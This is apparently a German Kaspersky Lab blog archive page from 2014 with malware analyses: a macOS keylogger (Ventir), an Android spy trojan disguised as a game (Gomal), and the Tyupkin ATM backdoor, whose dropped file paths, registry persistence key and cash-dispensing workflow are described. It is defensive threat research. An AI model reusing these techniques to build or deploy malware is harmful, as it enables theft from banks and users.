Die Datei Keymap.plist ist eine Karte der Übereinstimmung des Codes gedrückter Tasten mit ihren Werten. Die Datei EventMonitor verwendet sie zur Bestimmung der Tastaturwerte nach den entsprechenden Codes, die ihr mit der Datei updated.kext übermittelt werden.

Die Datei EventMonitor ist ein Dateiagent, der Daten von der Kernel-Erweiterung updated.kext entgegennimmt, sie verarbeitet und in die Log-Datei /Library/.local/.logfile schreibt. Hier als Beispiel ein Teil eines solchen Protokolls, das die vom Trojaner abgefangenen Anmeldedaten inklusive Passwort enthält:

Wie man auf dem Screenshot sieht, landen Benutzername und Kennwort des E-Mail-Accounts umgehend im Log, sobald das Opfer die Seite yandex.ru im Browser aufgerufen und die entsprechenden Daten dort eingegeben hat – und von dort wandern sie direkt in die Hände der Cyberkriminellen.

Diese Bedrohung ist gerade vor dem Hintergrund des noch nicht lange zurückliegenden Vorfalls besonders aktuell, bei dem es zum Verlust von Anmeldeinformationen und Passwörtern für Accounts bei Yandex.ru, Mail.ru und Gmail kam. Es ist nicht ausgeschlossen, dass am Auffüllen dieser Datenbanken auch Schädlinge der Familie Ventir beteiligt waren.

Zum Abschluss sei erwähnt, dass der Trojaner Trojan-Dropper.OSX.Ventir.a mit seiner multimodularen Struktur an den berüchtigten Trojan.OSX.Morcut (alias OSX/Crisis) erinnert, der in etwa dieselbe Anzahl an Modulen mit ähnlicher Bestimmung enthielt. Die Verwendung von Software mit offenem Quellcode erleichtert Cyberkriminellen die Konstruktion neuer Schädlinge erheblich. Daher ist davon auszugehen, dass die Zahl trojanischer Spionage-Programme künftig weiter steigen wird.

„Tic Tac Toe“ mit Überraschung


  10 Oktober 2014 | 13:00  MSK

Ihr Kommentar  

Die Versuche Cyberkrimineller, Schadprogramme als nützliche Anwendungen zu tarnen, sind so häufig geworden, dass sie schon zum Alltag gehören. Doch die Entwickler des neuen mobilen Trojaners Gomal zeigten sich nicht nur bei der Tarnung kreativ, indem sie ihrem Machwerk das Spiel „Tic Tac Toe“ hinzufügten, sondern sie statteten den Schädling auch mit interessanten und für diese Art von Software neuen Techniken aus.

Alles begann damit, dass uns das Spiel Tic Tac Toe zur Analyse überlassen wurde. Auf den ersten Blick machte die Anwendung einen völlig ungefährlichen Eindruck:

Tic Tac Toe mit Überraschung

Die Liste der von dem Spiel angefragten Ermächtigungen ließ uns allerdings stutzig werden. Wozu braucht die Anwendung Zugriff auf das Internet, auf die Kontakte des Anwenders und das SMS-Archiv, wozu die Möglichkeit, Anrufe und Audioaufzeichnungen zu verarbeiten? Wir haben Untersuchungen angestellt und herausgefunden, dass es sich bei diesem „Spiel“ in Wahrheit um eine multifunktionale Spionage-Software handelt. Zum gegenwärtigen Zeitpunkt wird diese Malware von den Kaspersky Lab-Produkten als Trojan-Spy.AndroidOS.Gomal.a detektiert.

Eine sorgfältige Untersuchung des Schädlings hat gezeigt, dass der Code des Spiels selbst weniger als 30% der hauptsächlichen ausführbaren Datei ausmacht. Der Rest ist der Funktionalität zur Bespitzelung des Anwenders und zum Diebstahl persönlicher Informationen vorbehalten.

Tic Tac Toe mit Überraschung

Grün eingefasst der Code des Spiels, mit roter Umrandung – der schädliche Teil des Programms

Was genau zählt nun zu dieser Funktionalität? In erster Linie enthält der Schädling die für mobile Schädlinge schon zum Standardprogramm gehörenden Funktionen ‚Audioaufzeichnung‘

Tic Tac Toe mit Überraschung

und SMS-Diebstahl.

Tic Tac Toe mit Überraschung

Zudem sammelt der Trojaner Informationen über das Gerät und sendet alle ergatterten Daten an den Server seiner Betreiber. Allerdings hat Trojan-Spy.AndroidOS.Gomal.a auch etwas Außergewöhnliches an sich – zusammen mit dem Trojaner wird auch ein ganzes Paket von interessanten Bibliotheken mitgeliefert.

Tic Tac Toe mit Überraschung

Bei einem Teil dieses Paketes handelt es sich um ein Exploit, das unerlässlich zum Erhalt von Root-Rechten auf einem Android-Gerät ist. Mit den erweiterten Privilegien hat die Anwendung Zugriff auf verschiedene Dienste des Betriebssystems Linux (auf dem Android basiert), insbesondere auf das Lesen des Speichers eines Prozesses und /maps.

Nach Erhalt der Root-Rechte macht sich der Trojaner an die Arbeit. So stiehlt er beispielsweise die Mail-Korrespondenz der Anwendung Good for Enterprise, wenn diese auf dem Smartphone installiert ist. Diese App wird als sicherer E-Mail-Client für Unternehmen positioniert, daher könnte der Datendiebstahl aus diesem Programm ernsthafte Probleme für das Unternehmen nach sich ziehen, in dem der angegriffene Mitarbeiter tätig ist. Für die Attacken auf Good for Enterprise empfängt der Trojaner mit Hilfe der Konsole (Befehl ps) die ID des interessierenden Prozesses und liest die virtuelle Datei /proc/<pid>/maps. Diese Datei enthält Informationen über die der Anwendung bereitgestellten Speicherblöcke.

Tic Tac Toe mit Überraschung

Nach Erhalt der Liste von Blöcken findet der Schädling den Block [heap], der die Zeilendaten der Anwendung enthält und erstellt eine Kopie des Speicherinhalts mit Hilfe einer weiteren Bibliothek aus seinem Paket. Daraufhin wird in dem nun erhaltenen Speicherauszug eine Suche nach für E-Mails typischen Signaturen durchgeführt, und die auf diese Weise gefundenen Mails werden an den Server der Cyberkriminellen weitergeleitet.

Darüber hinaus stiehlt Gomal Informationen aus Logcat – einem in Android integrierten Protokollierungsdienst, der für das Debugging von Anwendungen verwendet wird. Sehr häufig hinterlassen Entwickler auch nach der Veröffentlichung ihrer App kritisch wichtige Informationen in Logcat. Dank dieser Tatsache sind Cyberkriminelle in der Lage, noch mehr vertrauliche Informationen aus anderen Programmen zu stehlen.

Unter dem Strich eröffnet das auf den ersten Blick harmlose „Tic Tac Toe“ Verbrechern den Zugriff auf eine enorme Menge persönlicher Daten des Anwenders, sowie auf die Daten des Unternehmens, in dem er arbeitet. Die von Gomal angewandte Technik trat erstmals in Windows-Trojanern in Erscheinung, doch wie wir sehen, wird sie nun auch in Android-Schädlingen eingesetzt. Das Gefährlichste dabei ist jedoch, dass unter Anwendung derselben Prinzipien nicht nur Informationen aus Good for Enterprise gestohlen werden können: Es ist nicht ausgeschlossen, dass schon bald eine ganze Reihe von mobilen Schädlingen auf den Plan tritt, die weit verbreitete E-Mail-Clients, Messenger und andere Programme angreifen.

Ergänzung:

Trojan-Spy.AndroidOS.Gomal.a verwendet eine alte Version des Exploits, die auf Samsung-Geräten mit Betriebssystemen der Versionen 4.0.4 und niedriger funktioniert. Daher ist auf Geräten mit neuer Firmware eine Attacke eben dieser Version des Schädlings auf den E-Mail-Client des Unternehmens nicht erfolgreich.

Wir haben bisher noch keine Versuche registriert, unsere Anwender mit dem Trojaner Gomal zu infizieren. Doch obgleich dieses Sample bisher nicht in freier Wildbahn verbreitet ist, detektieren wir es, um künftig effektiv Angriffe mobiler Schädlinge abwehren zu können, die unter Umständen auf der Grundlage dieses Konzepts entwickelt wurden.

Tyupkin: Manipulation von Geldautomaten durch Malware


  Global Research and Analysis Team of Kaspersky Lab        7 Oktober 2014 | 10:48  MSK

Ihr Kommentar  

Früher in diesem Jahr führte Kasperskys Global Research and Analysis Team, GReAT, auf Anfrage einer Finanzinstitution, forensische Ermittlungen einer cyberkriminellen Attacke auf zahlreiche Geldautomaten in Osteuropa durch.

Im Zuge dieser Ermittlungen entdeckten wir ein Schadprogramm, dass es Angreifern ermöglicht, die Geldkassetten von Bankomaten durch direkte Manipulation zu leeren.

Zum Zeitpunkt der Ermittlungen war die Malware auf mehr als 50 Geldautomaten in osteuropäischen Banken aktiv. Ausgehend von von VirusTotal vorgelegten Daten glauben wir, dass das Schadprogramm sich in einige andere Länder ausgebreitet hat, die USA, Indien und China eingeschlossen.

Aufgrund der Natur der Geräte, auf denen die Malware läuft, verfügen wir nicht über KSN-Daten, um das Ausmaß der Infektion zu bestimmen. Doch auf der Grundlage einer von VirusTotal erstellten Statistik, erkennen wir ein Vorkommen dieses Schadprogramms in den folgenden Ländern:

Tyupkin: Manipulation von Geldautomaten durch Malware

Tyupkin: Manipulation von Geldautomaten durch Malware

Diese neue Malware, die von Kaspersky Lab als Backdoor.MSIL.Tyupkin detektiert wird, betrifft Geldautomaten von einem großen Bankomaten-Hersteller, auf denen Microsoft Windows 32 läuft.

Die Malware setzt verschiedene raffinierte Techniken ein, um eine Detektion zu vermeiden. Erstens ist sie nur in bestimmten Nachtstunden aktiv. Sie verwendet dabei einen zufällig generierten Schlüssel für jede Sitzung. Ohne diesen Schlüssel kann niemand mit dem infizierten Geldautomaten interagieren.

Wird der Schlüssel korrekt eingegeben, zeigt das Schadprogramm Informationen über den in jeder Kassette verfügbaren Geldbetrag an und ermöglicht einem Angreifer, ohne physischen Zugriff auf den Geldautomaten 40 Banknoten aus der ausgewählten Kassette zu entnehmen.

Die meisten der analysierten Samples wurden um den März 2014 herum kompiliert. Doch mit der Zeit hat sich diese Malware weiterentwickelt. In ihrer letzten Variante (Version .d) verfügt die Schadsoftware über Anti-Debug- und Anti-Emulationstechniken und deaktiviert zudem McAfee Solidcore auf einem infizierten System.

Analyse

Dem Bildmaterial der Überwachungskameras an den Standorten der infizierten Geldautomaten zufolge können die Angreifer das Gerät über eine bootbare CD manipulieren und die Malware installieren.

Die Angreifer kopieren die folgenden Dateien in den Geldautomaten:

C:\Windows\system32\ulssm.exe
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\AptraDebug.lnk

Nach mehreren Umgebungs-Checks entfernt das Schadprogramm die .lnk-Datei und erstellt einen Schlüssel in der Registry:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
“AptraDebug” = “C:\Windows\system32\ulssm.exe”

Die Malware ist dann in der Lage, mit Geldautomaten über die Standardbibliothek MSXFS.dll zu interagieren – Erweiterung für Finanzdienste (XFS).

Die Schadsoftware läuft in einer Endlosschleife und wartet auf Input des Nutzers. Um die Erkennung zu erschweren, nimmt Tyupkin (in der Standardeinstellung) nur sonntags und montags in der Nacht Befehle entgegen.

Die Malware akzeptiert die folgenden Befehle:

  • XXXXXX – Zeigt das Hauptfenster.
  • XXXXXX – Löscht sich selbst mit einer Batch-Datei.
  • XXXXXX – Verlängert die Zeitspanne der Malware-Aktivität.
  • XXXXXX – Verbirgt das Hauptfenster.

Nach jedem Befehl muss der Betreiber “Enter” auf dem Eingabefeld des Geldautomaten drücken.

Tyupkin verwendet Sitzungsschlüssel auch, um Interaktion mit zufälligen Nutzern zu verhindern. Nach Eingabe des Befehls zur Anzeige des Hauptfensters zeigt die Schadsoftware die Aufforderung “ENTER SESSION KEY TO PROCEED!”- „Geben Sie den Session-Schlüssel ein, um fortzufahren!“- an, wobei für jede Sitzung ein Seed Key verwendet wird.

Der Angreifer muss den Algorithmus kennen, um einen auf dem gezeigten Seed Key basierenden Sitzungsschlüssel generieren zu können. Nur wenn dieser Schlüssel korrekt eingegeben wird, ist es möglich, mit einem infizierten Geldautomaten zu interagieren.

Daraufhin zeigt die Malware die folgende Mitteilung an:

CASH OPERATION PERMITTED.
TO START DISPENSE OPERATION -
ENTER CASSETTE NUMBER AND PRESS ENTER.
(BAR-VORGANG ERLAUBT. UM DEN AUSGABEVORGANG ZU STARTEN, GEBEN SIE DIE KASSETTENNUMMER EIN UND DRÜCKEN SIE ENTER).

Wird nun eine Kassettennummer eingegeben, gibt der Geldautomat 40 Banknoten aus dieser Kassette aus.

Tyupkin: Manipulation von Geldautomaten durch Malware

Wird der Sitzungsschlüssel falsch eingegeben, deaktiviert das Schadprogramm das lokale Netzwerk und zeigt die folgende Nachricht an:

DISABLING LOCAL AREA NETWORK...
PLEASE WAIT...
(LOKALES NETZWERK WIRD DEAKTIVIERT…
BITTE WARTEN…)

Es ist nicht klar, warum die Malware das LAN deaktiviert. Vermutlich geschieht das, um entfernte Untersuchungen zu verhindern oder zu unterbrechen.

Ein Video mit einer Demonstration an einem echten Geldautomaten ist unter dem folgenden Link verfügbar: http://youtu.be/QZvdPM_h2o8

Fazit

In den letzten Jahren beobachten wir eine deutliche Zunahme von Angriffen auf Geldautomaten unter Verwendung von Skimming-Geräten und Schadsoftware. Nach umfassenden Berichten über Fälle, bei denen Finanzdaten von Banken auf der ganzen Welt abgegriffen wurden, kam es zu einem energischen Durchgreifen der Strafverfolgungsbehörden rund um den Globus, das zu Verhaftungen und Verurteilungen von Cyberkriminellen führte.

Die erfolgreiche Verwendung von Skimming-Geräten zum heimlichen Auslesen und Kopieren von Kredit- und Bankkarten, wenn die Kunden ihre Karten in Geldautomaten bei Banken oder Tankstellen stecken, ist hinreichend bekannt. Dieses Problem ist mittlerweile stärker in das öffentliche Bewusstsein gerückt, so dass die Bankkunden nun auf der Hut sind und Vorsichtsmaßnahmen ergreifen, wenn sie öffentliche Bankomaten benutzen.

Nun werden wir Zeuge der natürlichen Evolution dieser Bedrohung, wobei die Cyberkriminellen in der Nahrungskette aufsteigen und nun die Finanzinstitutionen direkt angreifen. Das geschieht über die unmittelbare Infektion der Geldautomaten selbst oder durch direkte APT-artige Angriffe auf die Bank. Die Tyupkin-Malware ist ein Beispiel dafür, dass die Angreifer eine Stufe aufgestiegen sind und Schwachstellen in der Infrastruktur von Geldautomaten finden.

Die Tatsache, dass auf vielen Bankomaten Betriebssysteme mit bekannten Sicherheitslücken laufen, sowie fehlende Schutzlösungen sind weitere Probleme, die dringend behandelt werden müssen.

Wir empfehlen den Banken, die physische Sicherheit ihrer Geldautomaten zu überprüfen und über eine Investition in hochwertige Sicherheitslösungen nachzudenken.

Empfehlungen

Wir empfehlen Finanzinstitutionen und Organisationen, die Geldautomaten vor Ort betreiben, die folgenden Richtlinien zu beachten:

  • Überprüfen Sie die physische Sicherheit Ihrer Geldautomaten und denken Sie über eine Investition in hochwertige Sicherheitslösungen nach.
  • Ändern Sie die Standard Upper Pool Lock und die Standard-Schlüssel in allen Geldautomaten. Vermeiden Sie die Verwendung von Master-Keys vom Hersteller.
  • Installieren Sie Alarmanlagen an den Geldautomaten und stellen Sie sicher, dass sie auch funktionieren. Beobachtungen zufolge infizierten die Cyberkriminellen hinter Tyupkin nur Geldautomaten ohne Alarmanlagen.
  • Um zu erfahren, wie Sie in einem Schritt herausfinden können, ob Ihre Automaten infiziert sind, nehmen Sie über die folgende Adresse Kontakt mit uns auf: intelreports@kaspersky.com. Um die Geldautomaten-Systeme komplett zu scannen und die Backdoor zu löschen, verwenden Sie bitte das kostenlose Virus Removal Tool von Kaspersky Lab (zum Download geht es hier).

Allgemeine Ratschläge für Betreiber von Geldautomaten außer Haus

  • Stellen Sie sicher, dass der Geldautomat in einer offenen, gut beleuchteten Umgebung steht, die von sichtbaren Überwachungskameras beobachtet wird. Der Bankomat sollte sicher auf dem Boden mit einem Anti-Lasso-Gerät befestigt sein, das Verbrecher abschreckt.
  • Überprüfen Sie die die Bankomaten regelmäßig auf Anzeichen, die auf das Anbringen von Dritt-Geräten (Skimmer) hinweisen.
  • SeienSie auf der Hut vor Social Engineering-Attacken von Kriminellen, die sich als Sicherheitsinspektoren für die Alarmanlagen, Überwachungsanlagen oder andere Geräte vor Ort ausgeben.
  • Nehmen Sie Eindringungsalarme ernst und verhalten Sie sich dementsprechend, indem Sie die zuständigen Strafverfolgungsbehörden über jedes potentielle Leck informieren.
  • Ziehen Sie in Betracht, den Geldautomaten mit gerade ausreichend Geld für den Betrieb für einen Tag auszustatten.
  • Mehr Empfehlungen - sowohl für Händler als auch für Nutzer - finden Sie unter  http://www.link.co.uk/AboutLINK/site-owners/Pages/Security-for-ATMs.aspx

KSN-Report zu mobilen Cyberbedrohungen: Android-paranoid


   6 Oktober 2014 | 15:00  MSK

Ihr Kommentar  

Smartphones und Tablets haben sich schon lange als beliebte persönliche Geräte etabliert. Eine im Frühjahr 2014 durchgeführte gemeinsame Studie von Kaspersky Lab und B2B International hat gezeigt, dass 77% der befragten Internetnutzer mehrere Geräte zum Surfen im World Wide Web benutzen – neben den traditionellen Computern sind das insbesondere Smartphones und Tablets. Laut IDC wurden im zweiten Quartal 2014 insgesamt 85% des Marktes für mobile Geräte von Android eingenommen. Diese Zahlen sind eine Bestätigung der unangefochtenen Führungsrolle Androids unter den mobilen Umgebungen.

Das bedeutet auch, dass Geräte unter Android unweigerlich die Aufmerksamkeit von Cyberkriminellen auf sich ziehen, die Malware entwickeln und in Umlauf bringen. Wir schätzen, dass 98,05% aller existierenden mobilen Schadprogramme die Nutzer von Android-Geräten angreift. Aber wie viel genau sind “alle existierenden Schadprogramme“? Unsere Daten zeigen, dass allein in der ersten Hälfte des laufenden Jahres 175.442 neue individuelle Schadprogramme für Android detektiert wurden. Das sind 18,3% (oder 32.231 Schadprogramme) mehr als in dem gesamten Jahr 2013. Aus diesem und anderen Gründen kann man mit Fug und Recht behaupten, dass die erdrückende Mehrheit mobiler Cyberbedrohungen sich gegen Android richtet.

Um einschätzen zu können, wie groß diese Bedrohung ist, haben wir unseren Kaspersky Security Network Report zu mobilen Cyberbedrohungen erstellt. Erstmals arbeiteten wir dabei mit einem externen Partner zusammen, um unsere Studie zu vervollständigen. Unsere Kollegen von INTERPOL teilten dabei ihre Fachmeinung darüber mit uns, wie sich die Cyberkriminalität entwickelt hat, sowie einige Informationen darüber, welche Art mobiler Bedrohungen sie in letzter Zeit ermittelt haben.

Diese Studie bezieht sich auf den 12monatigen Zeitraum vom 1. August 2013 bis zum 31 Juli 2014. Der Untersuchungszeitraum wurde auf der Grundlage von Kaspersky Lab-Daten ausgewählt. Kaspersky Lab begann im Mai 2012 statistische Daten über Angriffe gegen Android-User zusammenzutragen. Im Laufe der folgenden zwei Jahre wurde beobachtet, dass die Zahl der Android-Bedrohungen, die Zahl der Angriffe und die Zahl der angegriffenen User gerade innerhalb des oben erwähnten Zeitraums besonders stark gestiegen sind.

Detektionen der Kaspersky Lab-Sicherheitsprodukte von  Cyberattacken auf Android-Geräte im Laufe der gesamten Beobachtungsgeschichte


Detektionen der Kaspersky Lab-Sicherheitsprodukte von Cyberattacken auf Android-Geräte im Laufe der gesamten Beobachtungsgeschichte.

Die Quelle der in der vorliegenden Studie verwendeten Daten ist der Cloud-Service Kaspersky Security Network (KSN), an dem mehr als 5.000.000 Nutzer von Android-basierten Smartphones und Tablets teilnehmen, die von Kaspersky Lab-Produkten geschützt werden. Im Rahmen dieser Studie wurden die von diesen Geräten gesammelten Daten analysiert.

Die wichtigsten Studienergebnisse in der Zusammenfassung:


  • Innerhalb von 12 Monaten meldeten die Sicherheitsprodukte von Kaspersky Lab 3.408.112 Malware-Detektionen auf den Geräten von 1.023.202 Nutzern.

  • Innerhalb von 10 Monaten, von August 2013 bis März 2014, hat sich die Zahl der Attacken pro Monat fast verzehnfacht, von 6.000 im August 2013 auf 644.000 im März 2014.

  • Die Zahl der angegriffenen Nutzer ist ebenfalls drastisch gestiegen, von 35.000 im August 2013 auf 242.000 im März 2014.

  • 59.06% der Malware-Detektionen sind Programmen zuzuordnen, die in der Lage sind, den Anwendern Geld zu stehlen

  • Ungefähr 500.000 Nutzer waren mit mobiler Malware konfrontiert, die mindestens auf den Diebstahl von Geld spezialisiert ist.

  • In Russland, Indien, Kasachstan, Vietnam, der Ukraine und Deutschland wurden die meisten Angriffe registriert.

  • Die auf den Versand von SMS spezialisierten Trojaner waren die am weitesten verbreiteten Schadprogramme im Untersuchungszeitraum. Auf sie entfielen 57,08% aller Detektionen.

  • Die Zahl der Modifikationen mobiler Bank-Trojaner ist innerhalb von 12 Monaten um mehr als das 14-Fache gestiegen – von einigen hundert auf mehr als 5000.

In der Studie wurde zudem das Benehmen einiger weit verbreiteten Typen von Android-Schädlingen genauer unter die Lupe genommen. Insbesondere haben wir die Entwicklung von Attacken unter Verwendung von SMS und Bank-Trojanern sowie Spyware näher verfolgt. Ein weiteres Thema der Untersuchung sind die so genannten Affiliate Programme, oder auch Partner-Programme. Dabei handelt es sich um spezielle webbasierte Geschäftsmodelle, die vielfältige Betrugsarten ermöglichen, mittels derer Geld durch die Verbreitung von Schadprogrammen und die Infektion von Anwendergeräten verdient werden kann. Diese Programme senden SMS an Premium-Kurznummern, die das mobile Prepaid-Konto des Opfers leeren.

Während des Untersuchungszeitraums beobachteten wir mindestens vier große aktive Affiliate Programme, die für etwa ein Viertel aller Angriffe in dem entsprechenden Zeitraum verantwortlich waren. Alle diese Affiliate Programme waren vornehmlich in Russland und Ländern der ehemaligen Sowjetunion aktiv, aber jedes von ihnen verwendete eine andere Familie von SMS-Trojanern. Weitere vier Programme, die wir beobachteten, richteten sich in erster Linie gegen Nutzer aus Europa und Asien.

Wir haben mit Erstaunen festgestellt, dass die Aktivität fast aller Affiliate Programme, die wir verfolgten, im letzten Frühjahr deutlich zurückgegangen ist. Unserer Meinung nach liegt ein Grund für diesen Rückgang in einer Antibetrugsinitiative, die die russische Regierung im Mai dieses Jahres gestartet hat.

Wenn Sie mehr über die Android-Bedrohungslandschaft aus der Sicht von Kaspersky Lab und INTERPOL erfahren möchten, finden Sie hier hier den vollständigen Text der Studie.

Nach oben  |  Archiv >>

 

Copyright © 1996 - 2014
Kaspersky Lab
Industry Leading Antivirus Software
Alle Rechte vorbehalten
 

Email: webmaster@kaspersky.com
Datenschutzbestimmungen